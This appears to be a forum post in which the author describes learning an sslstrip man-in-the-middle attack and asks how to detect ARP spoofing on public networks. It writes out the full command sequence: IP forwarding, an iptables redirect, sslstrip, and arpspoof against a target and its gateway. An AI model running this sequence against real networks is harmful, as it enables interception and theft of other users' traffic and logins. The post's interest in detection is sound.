I just learn how to do a man in the middle attack with sslstrip i finally understood that using wired or wireless connection is not secure. Well I knew those danders with wlan, but I taught wired connection to be save.
Is this the "best" way to do this, or does I do something unneeded.
Cause this arpspoofing etc. is so easy to do so how can I find out if someone is doing this. Like if I'm in public WLAN. Yes, I sslstrip creates that fake certificate, but just messenger etc.Code:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -a -l 8080
arpspoof -i eth0 -t (target) (gateway)
Well I can use wireshark and look if there is anything strange in ARP. is there a easier way to do it?